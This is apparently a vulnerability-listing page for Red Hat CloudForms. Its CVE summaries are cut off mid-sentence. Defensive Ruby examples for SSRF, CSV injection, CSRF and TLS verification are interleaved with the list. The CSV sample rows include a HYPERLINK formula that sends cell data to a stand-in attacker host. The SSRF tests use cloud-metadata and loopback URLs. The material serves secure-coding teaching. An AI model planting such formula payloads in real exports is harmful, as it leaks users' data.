Red Hat CloudForms Management Engine

42 known vulnerabilities across versions
Vulnerabilities are listed by affected version; each entry gives the CVE, the affected version range, the description and the severity score where one is listed.
CVE-2014-8164 | all versions | 9.1 CRITICAL
An insecure configuration for certificate verification (http.verify_mode = OpenSSL::SSL::VERIFY_NONE) may lead to verification bypa

CVE-2020-14324 | < 5.11.7.0 | 9.1 CRITICAL
A high severity vulnerability was found in all active versions of Red Hat CloudForms before 5.11.7.0. The out of band OS command i

CVE-2020-14296 | all versions | 7.1 HIGH
Red Hat CloudForms 4.7 and 5 were vulnerable to a Server-Side Request Forgery (SSRF) flaw. With the access to add Ansible Tower provi
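CVE-2020-14296 is the usual SSRF shape: a user who may register a provider supplies a URL, and the appliance connects to it from inside the management network. The guard below is an added example (not CloudForms or ManageIQ code) of validating such a URL before the server fetches it: allowlist the scheme, resolve the host, and refuse if any answer lands in loopback, RFC 1918, link-local (including the 169.254.169.254 cloud metadata address) or other non-routable ranges. The DNS table, hostnames and the 203.0.113.0/24 addresses are constructed for the example so it runs offline.

```ruby
require 'uri'
require 'ipaddr'

# Constructed, offline stand-in for DNS. A real deployment would resolve with
# Resolv and then connect to the exact IP it validated (not re-resolve), so a
# rebinding name cannot pass the check and then answer differently.
FAKE_DNS = {
  'tower.example.com'  => ['203.0.113.10'],
  'rebind.example.com' => ['203.0.113.11', '10.0.0.5'], # one public, one internal answer
  'localhost'          => ['127.0.0.1']
}.freeze

ALLOWED_SCHEMES = %w[https].freeze

# Ranges a server-side fetch of a user-supplied URL must never reach.
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 100.64.0.0/10 127.0.0.0/8 169.254.0.0/16
  172.16.0.0/12 192.168.0.0/16 ::1/128 fc00::/7 fe80::/10 ::ffff:0:0/96
].map { |cidr| IPAddr.new(cidr) }.freeze

# Fail closed: anything that is not a parseable address counts as blocked.
def blocked_address?(ip)
  addr = IPAddr.new(ip)
  BLOCKED_RANGES.any? { |range| range.include?(addr) }
rescue IPAddr::InvalidAddressError
  true
end

# IP literals resolve to themselves; names go through the (constructed) table.
def resolve(host, dns = FAKE_DNS)
  return [host] if host.match?(/\A[\d.]+\z/) || host.include?(':')
  dns.fetch(host, [])
end

# Returns [true, nil] when url is safe to fetch server-side, else [false, reason].
def safe_provider_url?(url, dns = FAKE_DNS)
  uri = URI.parse(url)
  return [false, 'scheme not allowed'] unless ALLOWED_SCHEMES.include?(uri.scheme)
  return [false, 'userinfo not allowed'] if uri.userinfo
  host = uri.hostname.to_s # hostname strips the [] around IPv6 literals
  return [false, 'missing host'] if host.empty?
  addrs = resolve(host, dns)
  return [false, 'host does not resolve'] if addrs.empty?
  bad = addrs.find { |a| blocked_address?(a) }
  return [false, "resolves to blocked address #{bad}"] if bad
  [true, nil]
rescue URI::InvalidURIError
  [false, 'unparseable url']
end

if __FILE__ == $PROGRAM_NAME
  %w[https://tower.example.com/api/v2/ https://rebind.example.com/
     https://169.254.169.254/latest/meta-data/ https://[::1]/].each do |u|
    puts "#{u} => #{safe_provider_url?(u).inspect}"
  end
end
```

The "any answer blocked" rule matters: a name that returns one public and one internal address (rebind.example.com above) is rejected outright rather than trusted on its public answer. Redirects need the same treatment on every hop, since a validated public host can 302 the client to an internal address.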
CVE-2020-10780 | all versions | 6.3 MEDIUM
Red Hat CloudForms 4.7 and 5 are affected by a CSV Injection flaw; a crafted payload stays dormant until a victim exports as CSV and op
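The CSV injection in CVE-2020-10780 works because a value an attacker controls (a VM or tenant name, say) is written verbatim into an export and a spreadsheet later evaluates it as a formula. Below is an added example, not the project's export code, showing a vulnerable export next to a hardened one that neutralises formula-leading cells with the usual apostrophe prefix, plus a small scanner that reports which cells of an export a spreadsheet would evaluate. The rows are constructed sample data; the trigger-character list follows the OWASP CSV injection guidance (=, +, -, @, tab, carriage return).

```ruby
require 'csv'

# Leading characters that make Excel and LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"].freeze

# Constructed sample rows: the second and third "names" are attacker-supplied.
SAMPLE_ROWS = [
  ['name', 'owner', 'cpus'],
  ['web-01', 'alice', 2],
  ['=HYPERLINK("https://attacker.example/?"&A1,"click")', 'mallory', 1],
  ['@SUM(1+1)', 'mallory', 4]
].freeze

# Only strings are escaped: prefixing a numeric -5 would turn a number column
# into text, which is the usual complaint about naive CSV sanitisers.
def csv_safe(value)
  return value unless value.is_a?(String)
  return value unless FORMULA_TRIGGERS.include?(value[0])
  "'" + value
end

# Vulnerable: user-controlled strings go straight into the file.
def export_vulnerable(rows)
  CSV.generate { |csv| rows.each { |r| csv << r } }
end

# Hardened: every cell passes through csv_safe; CSV handles quoting.
def export_hardened(rows)
  CSV.generate { |csv| rows.each { |r| csv << r.map { |c| csv_safe(c) } } }
end

# Audit helper: cells in an existing export that would be evaluated as formulas.
def formula_cells(csv_text)
  CSV.parse(csv_text).flatten.compact.select { |c| FORMULA_TRIGGERS.include?(c[0]) }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable export evaluates: #{formula_cells(export_vulnerable(SAMPLE_ROWS)).inspect}"
  puts "hardened export evaluates:   #{formula_cells(export_hardened(SAMPLE_ROWS)).inspect}"
  puts export_hardened(SAMPLE_ROWS)
end
```

The apostrophe survives a round trip through the CSV parser, so the scanner sees a cell starting with ' rather than =, which is exactly what the spreadsheet will see. The same escaping belongs on any other export path (PDF, XLSX) that carries user-supplied names, and on input validation for the names themselves where the product allows it.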
CVE-2019-14894 | all versions | 8.0 HIGH
A flaw was found in the CloudForms management engine version 5.10 and CloudForms management version 5.11, which triggered remote c

CVE-2019-14905 | all versions | 5.6 MEDIUM
A vulnerability was found in Ansible Engine versions 2.9.x before 2.9.3, 2.8.x before 2.8.8, 2.7.x before 2.7.16 and earlier, wher

CVE-2020-1740 | all versions | 3.9 LOW
A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit"

CVE-2020-1738 | all versions | 3.9 LOW
A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previ

CVE-2020-1736 | all versions | 2.2 LOW
A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified. This set

CVE-2020-1735 | all versions | 4.2 MEDIUM
A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, a

CVE-2020-1739 | all versions | 3.9 LOW
A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "passw

CVE-2020-1733 | all versions | 5.0 MEDIUM
A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with

CVE-2012-6685 | all versions | 7.5 HIGH
Nokogiri before 1.5.4 is vulnerable to XXE attacks

CVE-2019-14864 | all versions | 6.5 MEDIUM
Ansible, versions 2.9.x before 2.9.1, 2.8.x before 2.8.7 and Ansible versions 2.7.x before 2.7.15, is not respecting the flag no_l

CVE-2014-3536 | all versions | 5.5 MEDIUM
CFME (CloudForms Management Engine) 5: RHN account information is logged to top_output.log during registration

CVE-2014-0197 | >= 5.0 and <= 5.9.3.1 | 8.8 HIGH
CFME: CSRF protection vulnerability via permissive check of the referrer header
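CVE-2014-0197 describes CSRF protection that relied on a permissive Referer check, and CVE-2017-2653 (listed further down) is the related failure of exposing delete routes over GET, where a Referer or token check is never consulted in the first place. The block below is an added example, not code from CloudForms or ManageIQ: the permissive comparison is assumed to be a substring match (the page does not say which form the original check took), shown next to a strict origin comparison, and a gatekeeper that refuses state-changing actions over safe HTTP methods regardless of the Referer. The application origin and the request hashes are constructed for the example.

```ruby
require 'uri'

# Assumed deployment origin for the example.
APP_ORIGIN = URI.parse('https://cfme.example.com').freeze

# Permissive form (assumed): any Referer that merely contains the application
# host passes, so attacker-controlled names like cfme.example.com.attacker.example
# or a query string containing the host are accepted.
def referer_ok_permissive?(referer)
  referer.to_s.include?(APP_ORIGIN.host)
end

# Strict form: parse the header and require scheme, host and port to match
# exactly; an absent or unparseable header fails closed.
def referer_ok_strict?(referer)
  return false if referer.nil? || referer.empty?
  uri = URI.parse(referer)
  uri.scheme == APP_ORIGIN.scheme && uri.host == APP_ORIGIN.host && uri.port == APP_ORIGIN.port
rescue URI::InvalidURIError
  false
end

SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

# Gate for a state-changing action such as a delete route. `request` is a plain
# Hash constructed for the example: { method:, origin:, referer: }.
# Origin is preferred when the browser sends it; Referer is the fallback.
def allow_state_change?(request, checker = :referer_ok_strict?)
  return false if SAFE_METHODS.include?(request[:method]) # CVE-2017-2653 pattern
  source = request[:origin] || request[:referer]
  send(checker, source)
end

if __FILE__ == $PROGRAM_NAME
  evil = 'https://cfme.example.com.attacker.example/csrf.html'
  puts "permissive accepts #{evil}: #{referer_ok_permissive?(evil)}"
  puts "strict accepts #{evil}: #{referer_ok_strict?(evil)}"
  puts "DELETE via GET allowed: #{allow_state_change?(method: 'GET', referer: APP_ORIGIN.to_s)}"
end
```

Two caveats a practitioner will hit: browsers strip Referer under many Referrer-Policy settings, so a fail-closed Referer check breaks legitimate users unless Origin is also accepted, and either header is only a backstop. The primary control remains a per-session anti-CSRF token on every non-safe request (Rails protect_from_forgery), which is why routes that mutate state must be declared with POST/PUT/DELETE so the token check actually runs.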
CVE-2018-10854 | all versions | 5.4 MEDIUM
CloudForms 5.8 and 5.9 are vulnerable to cross-site scripting. A flaw was found in CloudForms's v

CVE-2013-6461 | all versions | 6.5 MEDIUM
Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by failing to apply limits

CVE-2013-6460 | all versions | 6.5 MEDIUM
Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsing XML documents

CVE-2019-10177 | all versions | 6.5 MEDIUM
A stored cross-site scripting (XSS) vulnerability was found in the PDF export component of CloudForms, versions 5.9 and 5.10, due

CVE-2017-15123 | >= 5.8 and <= 5.10 | 5.3 MEDIUM
A flaw was found in the CloudForms web interface, versions 5.8 - 5.10, where the RSS feed URLs are not properly restricted to auth

CVE-2016-5402 | all versions | 8.8 HIGH
A code injection flaw was found in the way capacity and utilization imported control files are processed. A remote, authenticated

CVE-2016-7047 | >= 5.6 and < 5.6.3.0 | 4.3 MEDIUM
A flaw was found in the CloudForms API before 5.6.3.0, 5.7.3.1 and 5.8.1.2. A user with permissions to use the MiqReportResults ca

CVE-2016-7071 | < 5.6.2.2 | 8.8 HIGH
It was found that CloudForms before 5.6.2.2, and 5.7.0.7 did not properly apply permissions controls to VM IDs passed by users

CVE-2017-7528 | all versions | 5.2 MEDIUM
Ansible Tower as shipped with Red Hat CloudForms Management Engine 5 is vulnerable to CRLF Injection. It was found that X-Forwarde

CVE-2017-2632 | < 5.7.1.3 | 4.9 MEDIUM
A logic error in valid_role() in CloudForms role validation before 5.7.1.3 could allow a tenant administrator to create groups wit

CVE-2017-2653 | < 5.7.2.1 | 4.1 MEDIUM
A number of unused delete routes are present in CloudForms before 5.7.2.1 which can be accessed via GET requests instead of just P

CVE-2017-7497 | all versions | 4.1 MEDIUM
The dialog for creating cloud volumes (cinder provider) in CloudForms does not filter cloud tenants by user. An attacker with the

CVE-2017-15125 | < 5.9.0.22 | 6.5 MEDIUM
A flaw was found in CloudForms before 5.9.0.22 in the self-service UI snapshot feature where the name field is not properly saniti

CVE-2017-2639 | all versions | 6.5 MEDIUM
It was found that CloudForms does not verify that the server hostname matches the domain name in the certificate when using a cust
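Two entries on this page are the two halves of TLS client verification: CVE-2014-8164 (verify_mode set to OpenSSL::SSL::VERIFY_NONE, so the chain is never checked) and CVE-2017-2639 (chain checked, but the hostname is not matched against the certificate). The block below is an added example, not CloudForms or ManageIQ code, written against Ruby's OpenSSL::SSL::SSLContext, which is what Net::HTTP's http.verify_mode and http.verify_hostname settings configure underneath. It shows the vulnerable context beside a hardened one, an audit predicate that flags either misconfiguration, and the hostname match performed on a self-signed certificate constructed in the block (names under example.com are assumptions).

```ruby
require 'openssl'

# CVE-2014-8164 pattern: the peer certificate is accepted without any check.
def vulnerable_ssl_context
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  ctx
end

# Hardened: verify the chain AND require the name to match. VERIFY_PEER on its
# own is the CVE-2017-2639 state: a valid certificate for any name is accepted.
# ca_file lets a self-hosted provider's private CA be trusted explicitly.
def hardened_ssl_context(ca_file = nil)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_PEER
  ctx.verify_hostname = true
  ctx.min_version = OpenSSL::SSL::TLS1_2_VERSION
  if ca_file
    ctx.ca_file = ca_file
  else
    ctx.cert_store = OpenSSL::X509::Store.new.tap(&:set_default_paths)
  end
  ctx
end

# Audit predicate: true when a context has either of the two weaknesses above.
def weak_tls_context?(ctx)
  ctx.verify_mode == OpenSSL::SSL::VERIFY_NONE || !ctx.verify_hostname
end

# Constructed self-signed certificate standing in for a provider's certificate.
def self_signed_cert(common_name, dns_names)
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2 # X.509 v3, needed for extensions
  cert.serial = 1
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{common_name}")
  cert.issuer = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = cert
  san = dns_names.map { |n| "DNS:#{n}" }.join(',')
  cert.add_extension(ef.create_extension('subjectAltName', san, false))
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end

# The check VERIFY_PEER alone never performs: does this certificate name the
# host we intended to talk to? Handles SAN entries and leftmost-label wildcards.
def hostname_matches?(cert, hostname)
  OpenSSL::SSL.verify_certificate_identity(cert, hostname)
end

# Assumed provider certificate: valid for vcenter.example.com and *.lab.example.com.
PROVIDER_CERT = self_signed_cert('vcenter.example.com', ['vcenter.example.com', '*.lab.example.com'])

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable context weak? #{weak_tls_context?(vulnerable_ssl_context)}"
  puts "hardened context weak?   #{weak_tls_context?(hardened_ssl_context)}"
  %w[vcenter.example.com esx1.lab.example.com attacker.example.com].each do |h|
    puts "#{h}: #{hostname_matches?(PROVIDER_CERT, h)}"
  end
end
```

Where a product lets operators paste a custom CA for a provider, the CA must be loaded into the store used for VERIFY_PEER and hostname verification must stay on; turning verify_mode off to make a self-signed provider "work" reintroduces CVE-2014-8164 for every connection that shares the context.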
CVE-2017-2664 | < 5.7.3 | 6.5 MEDIUM
CloudForms Management Engine (cfme) before 5.7.3 and 5.8.x before 5.8.1 lacks RBAC controls on certain methods in the rails applic

CVE-2017-7530 | < 5.7.3 | 8.8 HIGH
In CloudForms Management Engine (cfme) before 5.7.3 and 5.8.x before 5.8.1, it was found that privilege check is missing when invo

CVE-2018-10905 | all versions | 7.8 HIGH
CloudForms Management Engine (cfme) is vulnerable to an improper security setting in the dRuby component of CloudForms. An attacke

CVE-2013-2049 | all versions | 7.5 HIGH
Red Hat CloudForms 2 Management Engine (CFME) allows remote attackers to conduct session tampering attacks by leveraging use of a

CVE-2014-0087 | < 5.3 | 8.8 HIGH
The check_privileges method in vmdb/app/controllers/application_controller.rb in ManageIQ, as used in Red Hat CloudForms Managemen

CVE-2016-4457 | all versions | 7.5 HIGH
CloudForms Management Engine before 5.8 includes a default SSL/TLS certificate.

CVE-2016-3702 | all versions | 5.3 MEDIUM
Padding oracle flaw in CloudForms Management Engine (aka CFME) 5 allows remote attackers to obtain sensitive cleartext information

CVE-2016-7040 | all versions | 8.8 HIGH
Red Hat CloudForms Management Engine 4.1 does not properly handle regular expressions passed to the expression engine via the JSON

CVE-2015-7502 | all versions | 5.1 MEDIUM
Red Hat CloudForms 3.2 Management Engine (CFME) 5.4.4 and CloudForms 4.0 Management Engine (CFME) 5.5.0 do not properly encrypt da

CVE-2013-2050 | all versions | no score listed
SQL injection vulnerability in the miq_policy controller in Red Hat CloudForms 2.0 Management Engine (CFME) 5.1 and ManageIQ Enter

CVE-2013-2068 | all versions | no score listed
Multiple directory traversal vulnerabilities in the AgentController in Red Hat CloudForms Management Engine 2.0 allow remote attac

CVE-2013-4172 | all versions | no score listed
The Red Hat CloudForms Management Engine 5.1 allows remote administrators to execute arbitrary Ruby code via unspecified vectors.
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin